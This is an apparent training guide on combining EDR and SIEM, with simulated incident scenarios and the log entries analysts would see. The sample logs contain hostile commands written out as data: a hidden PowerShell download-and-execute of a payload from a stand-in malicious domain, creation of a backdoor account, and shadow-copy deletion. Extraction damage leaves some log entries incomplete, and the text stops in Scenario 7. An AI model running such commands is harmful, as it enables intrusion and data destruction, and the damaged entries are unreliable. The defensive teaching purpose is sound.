Analysing EDR Logs With SIEM Integration

ANALYSING
EDR LOGS
WITH SIEM
INTEGRATION,
EXAMPLES AND
SIMULATIONS
BY IZZMIER IZZUDDIN
Table of Contents
COMBINING EDR WITH SIEM ............................................................................... 3
1. Understand the Roles of EDR and SIEM................................................................. 3
2. Integrate EDR Data into SIEM ............................................................................... 3
3. Build Cross-Platform Detection Rules .................................................................. 3
4. Develop an Integrated Incident Response Workflow ............................................. 3
5. Centralise Threat Hunting and Investigation ......................................................... 4
6. Enhance Reporting and Compliance .................................................................... 4
7. Continuous Improvement through Feedback Loops .............................................. 4
8. Enhance Skills and Training.................................................................................. 5
EXAMPLES AND SIMULATIONS ............................................................................. 6

Scenario 1: Suspicious Powershell Execution On Multiple Endpoints ............................ 6
Scenario 2: Lateral Movement Detected Via Suspicious Use Of Remote Desktop Protocol
(RDP)........................................................................................................................ 11
Scenario 3: Data Exfiltration Detected Via Unusual FTP Activity .................................. 16
Scenario 4: Malware Infection Detected Via Abnormal Powershell Activity .................. 21
Scenario 5: Phishing Attack Detected Via Unusual Email Activity ................................ 26
Scenario 6: Ransomware Attack Detected Via Unusual File Encryption Activity ........... 31
Scenario 7: Unauthorised Access Detected Via VPN Connection ................................ 36
Scenario 8: Malware Detected In Email Attachment With Lateral Movement ............... 41
COMBINING EDR WITH SIEM
1. Understand The Roles Of EDR And SIEM
• EDR focuses on monitoring, detecting and responding to threats at the endpoint
level. It provides deep visibility into endpoint activities, such as process
execution, file access and network connections.
• SIEM aggregates, normalises and analyses log data from multiple sources,
including EDR, firewalls, IDS/IPS and applications, to provide a holistic view of an
organisation’s security environment. SIEM excels at correlating events across
diEerent systems and identifying complex attack patterns.
2. Integrate EDR Data Into SIEM

• Enable Data Feeds
Configure your EDR solution to send logs and alerts to your SIEM platform.
Ensure that endpoint activity data, such as process execution, network
connections, file changes and user actions, are being fed into the SIEM in real-
time.
• Normalise and Correlate Data

Use the SIEM's data normalisation capabilities to convert raw EDR logs into a
standardised format. Set up correlation rules to identify suspicious activities
that may span across multiple endpoints or involve other network components.
• Enhance Alert Enrichment

Utilise EDR data to enrich SIEM alerts. For example, if a SIEM alert is generated
for a suspicious network connection, EDR data can provide additional context,
such as the processes or applications involved, the endpoint user and any
related activities.
3. Build Cross-Platform Detection Rules

• Create Correlated Alerts
Develop detection rules that use both EDR and SIEM data to identify threats. For
example, a rule could combine SIEM alerts for failed logins with EDR alerts for
unauthorised access attempts on an endpoint to detect a potential brute-force
attack.
• Leverage MITRE ATT&CK Framework

Use the MITRE ATT&CK framework to create detection rules that cover tactics
and techniques relevant to both EDR and SIEM data sources.
4. Develop An Integrated Incident Response Workflow

• Unified Playbooks
Create incident response playbooks that incorporate both SIEM and EDR
actions. For instance, if a SIEM alert identifies a potential attack, the playbook
could include steps to use EDR to isolate aEected endpoints, terminate
malicious processes and collect forensic data.
• Automate Response Actions

Utilise the SIEM’s automation and orchestration capabilities to trigger EDR
responses automatically. For example, configure the SIEM to initiate an EDR
investigation or endpoint isolation if certain conditions are met.
5. Centralise Threat Hunting And Investigation

• Use SIEM for Broad Threat Hunting
Perform initial threat hunting across the entire environment using SIEM's
aggregated data. Use its search and analytics capabilities to identify anomalies
or suspicious patterns that may warrant further investigation.
• Drill Down with EDR

Once potential threats are identified, use the EDR tool for a more detailed
investigation at the endpoint level. EDR provides deep visibility into endpoint
activities, such as process creation, registry changes and network connections,
to analyse the threat further.
6. Enhance Reporting And Compliance

• Comprehensive Reporting
Use SIEM to generate consolidated reports that include both network-level and
endpoint-level data. This helps in presenting a complete picture of the
organisation’s security posture to stakeholders and meeting compliance
requirements.
• Maintain Audit Trails

Ensure both SIEM and EDR logs are stored and accessible for future audits and
investigations. Retain logs for as long as necessary based on your organisation’s
compliance requirements.
7. Continuous Improvement Through Feedback Loops

• Review Incident Post-Mortems
Regularly review incidents that involved both EDR and SIEM data. Identify gaps in
detection, response or integration and adjust rules, playbooks or configurations
accordingly.
• Adapt to New Threats
Continuously update your detection rules and response strategies based on new
threat intelligence, emerging attack techniques and evolving business needs.
8. Enhance Skills And Training
• Cross-Train Teams
Ensure that SOC analysts are skilled in both SIEM and EDR platforms. Encourage
cross-training sessions to improve knowledge sharing and expertise.
• Regular Drills and Simulations

Conduct joint incident response exercises and simulations to test the combined
capabilities of your EDR and SIEM setup.
EXAMPLES AND SIMULATIONS
Scenario 1: Suspicious Powershell Execution On Multiple Endpoints
Overview: Your organisation uses both a SIEM platform (like Splunk or QRadar) and an
EDR solution (such as CrowdStrike Falcon or Microsoft Defender for Endpoint). The
SIEM receives an alert indicating potential malicious activity involving PowerShell
execution across multiple endpoints.
Alert Details:
• Alert Name: Suspicious PowerShell Script Execution
• Severity: High
• Source: EDR logs via SIEM integration
• Description: Multiple endpoints executed a suspicious PowerShell command

that matches known attack patterns. This behaviour was correlated with an
increased number of failed login attempts.
• Time of Alert: 29-08-2024 10:30:00 UTC
Log Data:
EDR Log Entry 1:
Timestamp: 29-08-2024 10:25:45 UTC
Endpoint: WIN10-CLIENT01
User: izzmier
Process: PowerShell.exe
CommandLine: powershell.exe -nop -w hidden -c "IEX(New-Object

Net.WebClient).DownloadString('http://malicious-domain.com/payload.ps1')"
Action: Blocked
Detection Method: Script Analysis
Threat ID: EDR-5678
Severity: High
EDR Log Entry 2:
Timestamp: 29-08-2024 10:26:10 UTC
User: iEah

Action: Blocked
Detection Method: Behavioural Analysis
Threat ID: EDR-5679
Severity: High
EDR Log Entry 3:
Timestamp: 29-08-2024 10:26:30 UTC
Endpoint: WIN10-SERVER01
User: administrator

Action: Blocked
Detection Method: Machine Learning
Threat ID: EDR-5680
Severity: High
SIEM Correlated Alert Log Entry:
Timestamp: 29-08-2024 10:30:00 UTC
Alert ID: SIEM-12345
Alert Name: Suspicious PowerShell Script Execution
Source: EDR Logs
Correlated Events: 3
AEected Hosts: WIN10-CLIENT01, WIN10-CLIENT02, WIN10-SERVER01
Correlated Threat ID: EDR-5678, EDR-5679, EDR-5680

Correlation Rule: Detect multiple PowerShell script executions with network
connections to suspicious domains
Severity: High
Analysis:
Step 1: Initial Triage
• Check the Alert Details:

The alert Suspicious PowerShell Script Execution is flagged as High severity,
indicating it requires immediate attention. The source is from EDR logs
correlated by the SIEM, suggesting a coordinated attack across multiple
endpoints.
• Review Correlated Events:

The SIEM alert aggregates three individual EDR events across three endpoints
(WIN10-CLIENT01, WIN10-CLIENT02, WIN10-SERVER01). Each event involves
executing a PowerShell command that attempts to download a script from an
external domain (malicious-domain.com).
Step 2: Investigate EDR Logs
• Examine the Command Line Field:

The PowerShell commands are identical across all logs:
powershell.exe -nop -w hidden -c "IEX(New-Object
This command:
o Runs PowerShell in a non-interactive mode (-nop), hidden window (-w

hidden).
o Uses the IEX (Invoke-Expression) command to execute a script directly

from a remote URL, a common tactic in fileless malware attacks.
• Determine the Threat Source and Behaviour:

The URL http://malicious-domain.com/payload.ps1 is a known malicious
domain hosting a payload script. The behaviour of downloading and executing
remote scripts without saving them to disk is indicative of a "living oE the land"
technique often used by advanced threats.
Step 3: Check for Additional Indicators
• Correlate with Other SIEM Data:

Search SIEM logs for other suspicious activities around the same time frame,
such as:
o Failed Logins: Check if there were any failed login attempts or successful
logins from unusual locations.
o Network TraZic: Look for outbound connections to suspicious IPs or

domains (like malicious-domain.com).
Example log entry from SIEM:
Timestamp: 29-08-2024 10:24:30 UTC
Source IP: 192.168.1.10 (WIN10-CLIENT01)
Destination IP: 203.0.113.15 (malicious-domain.com)
Action: Allowed
Protocol: HTTP
Threat Source: EDR Correlation
Event ID: NET-7890
Step 4: Take Containment Actions
• Isolate AZected Endpoints:

Use the EDR platform to isolate the aEected endpoints (WIN10-CLIENT01,
WIN10-CLIENT02, WIN10-SERVER01) from the network to prevent further spread
or exfiltration.
• Block Malicious Domains:

Coordinate with the network team to block outbound traEic to malicious-
domain.com at the firewall or proxy level.
• Terminate Malicious Processes:

Use the EDR tool to terminate the suspicious PowerShell process running on
each aEected endpoint.
Step 5: Conduct a Root Cause Analysis
• Analyse Host Forensics:

Perform in-depth forensic analysis on the isolated endpoints:
o Check for persistence mechanisms, such as scheduled tasks or startup

registry keys.
o Review the history of executed commands and installed applications.
• Identify Patient Zero:

Determine which endpoint was compromised first. This might reveal how the
attacker initially gained access (e.g., phishing email, vulnerable software).
Step 6: Report Findings and Recommend Remediation
• Prepare an Incident Report:

Document the findings, including:
o A timeline of events.
o Details of the PowerShell execution and correlation with other suspicious

activities.
o Actions taken to contain and remediate the threat.
o Recommendations for improving defences (e.g., enhanced endpoint

monitoring, user awareness training).
• Recommend Further Actions:
o Conduct a password reset for aEected user accounts.
o Review and enhance PowerShell execution policies.
o Apply patches or updates to vulnerable software.

Scenario 2: Lateral Movement Detected Via Suspicious Use Of Remote Desktop
Protocol (RDP)
Overview: The SIEM system receives an alert indicating suspicious lateral movement
within the network, detected by abnormal use of Remote Desktop Protocol (RDP)
across multiple endpoints. This is correlated with EDR logs showing unusual user
behaviour.
Alert Details:
• Alert Name: Suspicious Lateral Movement Detected via RDP
• Severity: Critical
• Description: Multiple endpoints have seen unauthorised use of RDP sessions

originating from a compromised account. The behaviour matches known lateral
movement tactics used by attackers to spread across a network.
• Time of Alert: 29-08-2024 12:45:00 UTC
Log Data:
EDR Log Entry 1:
Timestamp: 29-08-2024 12:40:05 UTC
Endpoint: WIN-SERVER-01
User: izzmier
Process: mstsc.exe
CommandLine: mstsc.exe /shadow:1 /noConsentPrompt
Action: Allowed
Detection Method: User Behaviour Analytics (UBA)
Threat ID: EDR-78901
Severity: High
EDR Log Entry 2:
Timestamp: 29-08-2024 12:42:15 UTC
User: izzmier
Process: mstsc.exe
CommandLine: mstsc.exe /v:WIN-SERVER-02
Action: Allowed
Detection Method: Anomaly Detection
Severity: High
EDR Log Entry 3:
Timestamp: 29-08-2024 12:43:30 UTC
Endpoint: WIN-SERVER-02
User: admin
Process: cmd.exe
CommandLine: cmd.exe /c net user hacker P@ssw0rd /add
Action: Allowed
Detection Method: Behaviour Analysis
Severity: Critical
Timestamp: 29-08-2024 12:45:00 UTC
Alert ID: SIEM-98765
Alert Name: Suspicious Lateral Movement Detected via RDP
Source: EDR Logs
Correlated Events: 3
AEected Hosts: WIN-SERVER-01, WIN10-CLIENT03, WIN-SERVER-02
Correlated Threat ID: EDR-78901, EDR-78902, EDR-78903
Correlation Rule: Detect suspicious RDP sessions with unusual user behaviour and
command execution
Severity: Critical
Analysis:

The SIEM alert named Suspicious Lateral Movement Detected via RDP is flagged
as Critical, indicating a possible severe security incident. The source is EDR logs
showing unauthorised RDP use across several endpoints.

The alert aggregates three EDR events, each involving unusual RDP sessions and
command execution across three endpoints (WIN-SERVER-01, WIN10-
CLIENT03, WIN-SERVER-02).
• Examine the Command Line Fields:
o Log Entry 1: mstsc.exe is used on WIN-SERVER-01 by user izzmier with

/shadow:1 /noConsentPrompt parameters, suggesting remote control
without user consent.
o Log Entry 2: mstsc.exe is used on WIN10-CLIENT03 by the same user

(izzmier) to connect to WIN-SERVER-02.
o Log Entry 3: cmd.exe on WIN-SERVER-02 is executed by user admin to

add a new user hacker with a preset password, a clear indication of a
malicious intent to maintain persistence.
Step 3: Correlate with Additional SIEM Data
• Correlate with Recent Login Events: Search for recent login events associated
with user izzmier
Timestamp: 29-08-2024 12:35:00 UTC
Source IP: 203.0.113.50
Destination: WIN-SERVER-01
User: izzmier
Action: Login Success
Authentication Type: RDP
Event ID: AUTH-2345

The login success event shows that the izzmier account logged in from an external IP
(203.0.113.50). This is an abnormal activity, suggesting the account might be
compromised.
• Check Network TraZic Logs: Look for suspicious outbound and inbound
connections:
Timestamp: 29-08-2024 12:33:25 UTC
Source IP: 192.168.100.5 (WIN-SERVER-01)
Destination IP: 203.0.113.15
Protocol: RDP
Action: Allowed
Threat Source: EDR Correlation
Event ID: NET-9998
The log shows an RDP connection originating from WIN-SERVER-01 to an external IP,
which is unusual and could indicate an attacker’s lateral movement.
Step 4: Take Immediate Containment Actions
• Isolate AZected Hosts: Use the EDR platform to isolate WIN-SERVER-01,

WIN10-CLIENT03 and WIN-SERVER-02 from the network to prevent further
compromise.
• Block Suspicious IP Addresses: Block the external IPs (203.0.113.50 and

203.0.113.15) at the network perimeter firewall.
• Terminate Malicious Sessions: Use the EDR to terminate any active RDP
sessions originating from the compromised account (izzmier)
• Identify the Initial Compromise: The izzmier account appears to be the initial
vector for the attack. Investigate how this account was compromised (e.g., via
phishing, brute-force, credential stuEing).
• Examine Host Forensics: Analyse logs from isolated hosts for signs of
persistence mechanisms (e.g., registry changes, new scheduled tasks) or
additional backdoors that might have been installed.
• Prepare an Incident Report: Document the incident details:

o Incident Description: Unauthorised RDP sessions across multiple hosts
detected, suggesting lateral movement by an attacker.
o AZected Accounts: izzmier and potentially admin (compromised for

privilege escalation).
o AZected Hosts: WIN-SERVER-01, WIN10-CLIENT03, WIN-SERVER-02.
o Indicators of Compromise (IoCs): External IPs (203.0.113.50,

203.0.113.15), newly created user hacker, unusual command executions.
o Containment Actions: Isolation of aEected hosts, blocking suspicious

IPs, terminating malicious sessions.
• Recommendations:
o Reset credentials for compromised accounts.
o Enforce multi-factor authentication (MFA) for all remote connections.
o Conduct an organisation-wide audit for other potential compromises.
o Review and tighten access controls for RDP.

Scenario 3: Data Exfiltration Detected Via Unusual FTP Activity
Overview: The SIEM system generates an alert indicating potential data exfiltration,
detected by unusual FTP activity across several endpoints. This is correlated with EDR
logs showing anomalous file transfers, indicating that an attacker may be attempting to
exfiltrate sensitive data from the network.
Alert Details:
• Alert Name: Data Exfiltration Detected via Unusual FTP Activity
• Description: Multiple endpoints have initiated large FTP transfers to an external

IP address. The behaviour is consistent with known data exfiltration techniques.
• Time of Alert: 29-08-2024 15:30:00 UTC
Log Data:
EDR Log Entry 1:
• Timestamp: 29-08-2024 15:25:05 UTC
• Endpoint: WIN-SERVER-03
• User: izzmier
• Process: ftp.exe
• CommandLine: ftp.exe -s
.txt
• Action: Allowed
• Detection Method: Anomaly Detection
• Threat ID: EDR-89001
• Severity: High
EDR Log Entry 2:
• Timestamp: 29-08-2024 15:27:15 UTC
• Endpoint: WIN10-CLIENT04
• User: izzmier
.txt
• Action: Allowed
• Detection Method: User Behaviour Analytics (UBA)
• Severity: High
EDR Log Entry 3:
• Timestamp: 29-08-2024 15:28:30 UTC
• User: admin
.txt
• Action: Allowed
• Detection Method: Behaviour Analysis
• Timestamp: 29-08-2024 15:30:00 UTC
• Alert ID: SIEM-87654
• Alert Name: Data Exfiltration Detected via Unusual FTP Activity
• Source: EDR Logs
• Correlated Events: 3
• AZected Hosts: WIN-SERVER-03, WIN10-CLIENT04, WIN-SERVER-04
• Correlated Threat ID: EDR-89001, EDR-89002, EDR-89003
• Correlation Rule: Detect unusual FTP activity that matches known data
exfiltration patterns
Analysis:

The SIEM alert, "Data Exfiltration Detected via Unusual FTP Activity," is flagged as
Critical, indicating a severe security incident. The alert source is EDR logs
showing unauthorised FTP activity across several endpoints.

The alert aggregates three EDR events, each involving FTP sessions across three
endpoints (WIN-SERVER-03, WIN10-CLIENT04, WIN-SERVER-04).
o Log Entry 1: ftp.exe is used on WIN-SERVER-03 by user izzmier, executing

a script upload.txt, suggesting a bulk file transfer.
o Log Entry 2: The same command ftp.exe -s:upload.txt is used on WIN10-

CLIENT04 by the same user (izzmier), indicating repeated behaviour
across diEerent machines.
o Log Entry 3: ftp.exe -s:upload.txt is executed on WIN-SERVER-04 by user

admin, raising concerns as this account is often used for administrative
tasks, not data transfer.
• Correlate with Recent Network TraZic Events:
o Timestamp: 29-08-2024 15:24:00 UTC
o Source IP: 192.168.100.10 (WIN-SERVER-03)
o Destination IP: 203.0.113.20
o Protocol: FTP
o Action: Allowed
o Event ID: NET-4567

The log shows a large volume of FTP traEic from WIN-SERVER-03 to an
external IP (203.0.113.20), which is unusual and indicates potential data
exfiltration.
• Check DNS Logs:
o Timestamp: 29-08-2024 15:22:10 UTC

o Queried Domain: malicious-domain.com
o Event ID: DNS-6789

The DNS log reveals that WIN-SERVER-03 queried a suspicious domain
just before the FTP activity, further supporting the data exfiltration
hypothesis.

WIN10-CLIENT04 and WIN-SERVER-04 from the network to prevent further data
leakage.
• Block Suspicious IP Addresses: Block the external IP (203.0.113.20) at the

network perimeter firewall.
• Terminate Malicious Processes: Use the EDR to terminate any

active ftp.exe processes originating from the compromised accounts.
• Identify the Initial Compromise: The account izzmier appears to be the initial
vector for the attack. Investigate how this account was compromised (e.g.,
phishing, credential theft).
persistence mechanisms or additional data that might have been transferred.
o Incident Description: Unauthorised FTP sessions across multiple hosts

detected, suggesting data exfiltration by an attacker.

o Indicators of Compromise (IoCs): External IP (203.0.113.20), queried

domain (malicious-domain.com), unusual FTP command executions.
o Containment Actions: Isolation of aEected hosts, blocking suspicious

IPs, terminating malicious FTP sessions.
o Implement DLP (Data Loss Prevention) solutions to monitor and block

unauthorised file transfers.
o Enforce multi-factor authentication (MFA) for all administrative accounts.
o Conduct a thorough audit of network traEic and DNS logs for other
potential data exfiltration attempts.
Scenario 4: Malware Infection Detected Via Abnormal Powershell Activity
Overview: The SIEM system generates an alert indicating a possible malware infection,
detected by abnormal PowerShell activity across multiple endpoints. This is correlated
with EDR logs showing the execution of suspicious PowerShell commands, indicative of
a malware attack.
Alert Details:
• Alert Name: Malware Infection Detected via Abnormal PowerShell Activity
• Severity: High
• Description: Multiple endpoints have executed suspicious PowerShell

commands that are often associated with malware infections. The behaviour
matches known tactics used by attackers to establish persistence and download
additional payloads.
• Time of Alert: 29-08-2024 18:15:00 UTC
Log Data:
EDR Log Entry 1:
• Timestamp: 29-08-2024 18:10:05 UTC
• User: izzmier
• Process: powershell.exe
• CommandLine: powershell.exe -nop -w hidden -c "IEX(New-Object

• Action: Allowed
• Severity: High
EDR Log Entry 2:
• Timestamp: 29-08-2024 18:12:15 UTC
• User: izzmier

• Action: Allowed
• Severity: High
EDR Log Entry 3:
• Timestamp: 29-08-2024 18:13:30 UTC
• User: admin

• Action: Allowed
• Timestamp: 29-08-2024 18:15:00 UTC
• Alert Name: Malware Infection Detected via Abnormal PowerShell Activity
• AZected Hosts: WIN-SERVER-05, WIN10-CLIENT05, WIN-SERVER-06
• Correlation Rule: Detect abnormal PowerShell activity associated with known

malware behaviour
• Severity: High
Analysis:

The SIEM alert "Malware Infection Detected via Abnormal PowerShell Activity" is
flagged as High, indicating a significant security incident. The source is EDR logs
showing unauthorised PowerShell executions across several endpoints.

The alert aggregates three EDR events, each involving the execution of
suspicious PowerShell commands on three endpoints (WIN-SERVER-05, WIN10-
CLIENT05, WIN-SERVER-06).
o Log Entry 1: powershell.exe -nop -w hidden -c "IEX(New-Object

Net.WebClient).DownloadString('http://malicious-
domain.com/payload.ps1')" was executed on WIN-SERVER-05 by user
izzmier. This command downloads and executes a script from a malicious
domain, a common method used by attackers to deliver malware.
o Log Entry 2: The same PowerShell command was executed on WIN10-

CLIENT05 by the same user, indicating repeated malicious behaviour
across multiple machines.
o Log Entry 3: The PowerShell command was executed on WIN-SERVER-06

by user admin, suggesting the attacker has gained elevated privileges and
is spreading malware across critical systems.
• Correlate with Recent Web TraZic Logs:
o Timestamp: 29-08-2024 18:09:45 UTC
o Destination URL: http://malicious-domain.com/payload.ps1
o Action: Allowed
o Event ID: WEB-1234

The web traEic log confirms that WIN-SERVER-05 successfully connected
to a known malicious domain to download the payload.
• Check DNS Logs:

o Timestamp: 29-08-2024 18:08:30 UTC
o Queried Domain: malicious-domain.com
o Event ID: DNS-7890

The DNS log reveals that WIN-SERVER-05 resolved the domain malicious-
domain.com just before the PowerShell command was executed, further
corroborating the malware infection scenario.

WIN10-CLIENT05 and WIN-SERVER-06 from the network to prevent further
malware spread.
• Block Malicious Domain: Block the domain malicious-domain.com at the

network perimeter firewall to prevent further connections.
• Terminate Malicious Processes: Use the EDR to terminate any active

PowerShell processes running the suspicious commands on the aEected hosts.
vector for the attack. Investigate how this account was compromised (e.g.,
phishing, credential theft).
persistence mechanisms (e.g., scheduled tasks, registry changes) or additional
malware that might have been deployed.
o Incident Description: Unauthorised PowerShell executions across

multiple hosts detected, indicating a malware infection.

o Indicators of Compromise (IoCs): Malicious domain malicious-

domain.com, suspicious PowerShell command executions, unusual DNS
queries.
o Containment Actions: Isolation of aEected hosts, blocking malicious
domain, terminating malicious PowerShell processes.
o Implement PowerShell logging and script-blocking policies to prevent

unauthorised PowerShell usage.
o Conduct a network-wide scan for other potential infections.
o Review and update endpoint security configurations to prevent future

malware infections.
Scenario 5: Phishing Attack Detected Via Unusual Email Activity
Overview: The SIEM system generates an alert indicating a possible phishing attack,
detected by unusual email activity involving the mass sending of emails with suspicious
links. This is correlated with EDR logs showing the execution of an email client and a
web browser accessing known phishing domains.
Alert Details:
• Alert Name: Phishing Attack Detected via Unusual Email Activity
• Description: Multiple endpoints have been used to send emails containing links
to known phishing sites. This behaviour is consistent with phishing tactics used
by attackers to harvest credentials or deliver malware.
• Time of Alert: 29-08-2024 14:30:00 UTC
Log Data:
EDR Log Entry 1:
• Timestamp: 29-08-2024 14:25:05 UTC
• User: izzmier
• Process: outlook.exe
• CommandLine: outlook.exe /send "phishing_email_template.oft"
• Action: Allowed
• Severity: High
EDR Log Entry 2:
• Timestamp: 29-08-2024 14:26:45 UTC
• User: izzmier
• Process: chrome.exe
• CommandLine: chrome.exe --incognito "http://phishing-site.com/login"

• Action: Allowed
EDR Log Entry 3:
• Timestamp: 29-08-2024 14:28:30 UTC
• User: admin
• CommandLine: powershell.exe -ExecutionPolicy Bypass -File "Send-

PhishingEmails.ps1"
• Action: Allowed
• Timestamp: 29-08-2024 14:30:00 UTC
• Alert Name: Phishing Attack Detected via Unusual Email Activity
• AZected Hosts: WIN10-CLIENT07, WIN-SERVER-08, WIN10-CLIENT08
• Correlation Rule: Detect mass email sending with suspicious links and
abnormal user behaviour indicative of phishing attacks
Analysis:

The SIEM alert "Phishing Attack Detected via Unusual Email Activity" is flagged
as Critical, indicating a severe security incident. The source is EDR logs showing
unauthorised email sending and web access to phishing sites across multiple
endpoints.

The alert aggregates three EDR events, each involving suspicious activity,
including mass email sending and browsing to a known phishing domain.
o Log Entry 1: outlook.exe /send "phishing_email_template.oft" was

executed on WIN10-CLIENT07 by user izzmier, indicating that a pre-
prepared phishing email template was used to send out emails, a
common tactic in phishing campaigns.
o Log Entry 2: chrome.exe --incognito "http://phishing-site.com/login" was

executed on WIN-SERVER-08 by user izzmier, showing that the user
accessed a known phishing site in incognito mode, likely for testing or
further malicious activity.
o Log Entry 3: powershell.exe -ExecutionPolicy Bypass -File "Send-

PhishingEmails.ps1" was executed on WIN10-CLIENT08 by user admin,
indicating the use of a PowerShell script to automate the sending of
phishing emails.
• Correlate with Email Gateway Logs:
o Timestamp: 29-08-2024 14:24:30 UTC
o Source IP: 192.168.102.17 (WIN10-CLIENT07)
o Destination Email Addresses: Multiple external addresses
o Subject: "Urgent: Action Required"
o Attachment: phishing_email_template.oft
o Event ID: EMAIL-1234

The email gateway log confirms that emails with a suspicious subject line
and attachment were sent to multiple external recipients from WIN10-
CLIENT07.
• Check Web Proxy Logs:

o Timestamp: 29-08-2024 14:26:15 UTC
o Destination URL: http://phishing-site.com/login
o Action: Allowed
o Event ID: WEB-5678

The web proxy log shows that WIN-SERVER-08 accessed a known
phishing site, further supporting the phishing attack scenario.
• Isolate AZected Hosts: Use the EDR platform to isolate WIN10-CLIENT07, WIN-
SERVER-08 and WIN10-CLIENT08 from the network to prevent further email
sending and web access.
• Quarantine Malicious Emails: Use the email gateway to quarantine and delete
any phishing emails sent from WIN10-CLIENT07.
• Block Phishing Domain: Block the domain phishing-site.com at the network

perimeter firewall to prevent further access.
vector for the phishing attack. Investigate how this account was compromised
(e.g., spear-phishing, credential theft).
persistence mechanisms (e.g., registry changes, scheduled tasks) or additional
malware that might have been deployed.
o Incident Description: Unauthorised email sending and web access to

phishing domains detected, indicating a phishing attack.

o AZected Hosts: WIN10-CLIENT07, WIN-SERVER-08, WIN10-CLIENT08.
o Indicators of Compromise (IoCs): Known phishing domain phishing-

site.com, suspicious email template phishing_email_template.oft,
unusual PowerShell script execution.
o Containment Actions: Isolation of aEected hosts, quarantine of
malicious emails, blocking of phishing domain.
o Implement email filtering and anti-phishing tools to detect and block

phishing emails.
o Conduct an organisation-wide awareness campaign on phishing risks and

prevention.
o Review and update endpoint security policies to prevent unauthorised

email sending and script execution.
Scenario 6: Ransomware Attack Detected Via Unusual File Encryption Activity
Overview: The SIEM system generates an alert indicating a potential ransomware
attack, detected by unusual file encryption activity on multiple endpoints. This is
correlated with EDR logs showing the execution of suspicious processes that are known
to be associated with ransomware behaviour.
Alert Details:
• Alert Name: Ransomware Attack Detected via Unusual File Encryption Activity
• Description: Multiple endpoints have initiated file encryption processes. The

behaviour matches known ransomware tactics used by attackers to encrypt files
and demand ransom.
• Time of Alert: 29-08-2024 16:00:00 UTC
Log Data:
EDR Log Entry 1:
• Timestamp: 29-08-2024 15:55:10 UTC
• User: izzmier
• Process: vssadmin.exe
• CommandLine: vssadmin.exe delete shadows /all /quiet
• Action: Allowed
• Severity: High
EDR Log Entry 2:
• Timestamp: 29-08-2024 15:57:30 UTC
• User: izzmier
• Process: cryptoware.exe
• CommandLine: cryptoware.exe /encrypt C:\Users\Documents

• Action: Allowed
EDR Log Entry 3:
• Timestamp: 29-08-2024 15:59:45 UTC
• User: admin
• CommandLine: powershell.exe -ExecutionPolicy Bypass -File "Start-

Ransomware.ps1"
• Action: Allowed
• Timestamp: 29-08-2024 16:00:00 UTC
• Alert Name: Ransomware Attack Detected via Unusual File Encryption Activity
• AZected Hosts: WIN10-CLIENT09, WIN-SERVER-09, WIN10-CLIENT10
• Correlation Rule: Detect file encryption activity and known ransomware-related

process execution
Analysis:

The SIEM alert "Ransomware Attack Detected via Unusual File Encryption
Activity" is flagged as Critical, indicating a severe security incident. The source is
EDR logs showing file encryption processes initiated on multiple endpoints,
consistent with ransomware behaviour.

The alert aggregates three EDR events, each involving suspicious activity related
to file encryption and deletion of shadow copies.
o Log Entry 1: vssadmin.exe delete shadows /all /quiet was executed on

WIN10-CLIENT09 by user izzmier, indicating the deletion of shadow
copies, a common tactic used by ransomware to prevent file recovery.
o Log Entry 2: cryptoware.exe /encrypt C:\Users\Documents was executed

on WIN-SERVER-09 by user izzmier, showing that a known ransomware
executable was used to encrypt files in the Documents folder.
o Log Entry 3: powershell.exe -ExecutionPolicy Bypass -File "Start-

Ransomware.ps1" was executed on WIN10-CLIENT10 by user admin,
indicating the execution of a PowerShell script to start the ransomware
attack.
• Correlate with File Integrity Monitoring Logs:
o Timestamp: 29-08-2024 15:58:00 UTC
o File Path: C:\Users\Documents\Encrypted_File.docx
o Action: Modified
o Event ID: FIM-3456

The file integrity monitoring log shows that files in the Documents folder
on WIN-SERVER-09 were encrypted, confirming ransomware activity.
• Check Network TraZic Logs:
o Timestamp: 29-08-2024 15:59:00 UTC
o Source IP: 192.168.103.20 (WIN10-CLIENT10)

o Protocol: HTTPS
o Action: Allowed

The network traEic log shows an outbound HTTPS connection from
WIN10-CLIENT10 to an external IP, which could be used to exfiltrate
encryption keys or communicate with a command-and-control (C2)
server.
• Isolate AZected Hosts: Use the EDR platform to isolate WIN10-CLIENT09, WIN-
SERVER-09 and WIN10-CLIENT10 from the network to prevent further file
encryption and spread of the ransomware.
• Disable Network Shares: Disable network shares on aEected servers to prevent

the ransomware from spreading to other systems.
• Block External IPs: Block the external IP (203.0.113.20) at the network

perimeter firewall to prevent communication with the ransomware’s C2 server.
vector for the ransomware attack. Investigate how this account was
compromised (e.g., phishing, drive-by download, exploitation of vulnerabilities).
persistence mechanisms (e.g., registry changes, new scheduled tasks) or
additional malware that might have been deployed alongside the ransomware.
o Incident Description: Unauthorised file encryption detected on multiple

hosts, indicating a ransomware attack.

o AZected Hosts: WIN10-CLIENT09, WIN-SERVER-09, WIN10-CLIENT10.
o Indicators of Compromise (IoCs): Known ransomware

executable cryptoware.exe, suspicious PowerShell script Start-
Ransomware.ps1, deletion of shadow copies.
o Containment Actions: Isolation of aEected hosts, disabling of network
shares, blocking of external IPs.
o Restore encrypted files from backups, if available.
o Implement ransomware protection tools, such as application whitelisting

and advanced endpoint detection.
o Conduct an organisation-wide audit of security controls to identify and

close any gaps.
o Provide training to users on the dangers of ransomware and how to avoid

falling victim to phishing attacks.
Scenario 7: Unauthorised Access Detected Via VPN Connection
Overview: The SIEM system generates an alert indicating unauthorised access to the
network via a VPN connection. The alert is correlated with EDR logs showing suspicious
activity on a remote endpoint after the VPN connection was established, potentially
indicating that a compromised account or a malicious actor has gained access.
Alert Details:
• Alert Name: Unauthorised Access Detected via VPN Connection
• Severity: High
• Source: VPN logs via SIEM integration
• Description: A VPN connection was established from an unusual geographic

location using valid credentials. This was followed by abnormal activity on the
connected endpoint, indicating possible unauthorised access.
• Time of Alert: 29-08-2024 18:30:00 UTC
Log Data:
VPN Log Entry:
• Timestamp: 29-08-2024 18:20:00 UTC
• User: izzmier
• Source IP: 203.0.113.100 (Unusual Location: South America)
• Destination: Corporate Network
• VPN Client: OpenVPN
• Authentication Method: Username/Password
• VPN Session ID: VPN-65432
• Action: Connection Established
• Severity: Medium
EDR Log Entry 1:
• Timestamp: 29-08-2024 18:25:15 UTC
• User: izzmier
• CommandLine: powershell.exe -ExecutionPolicy Bypass -File "Invoke-
DataExfiltration.ps1"
• Action: Allowed
• Severity: High
EDR Log Entry 2:
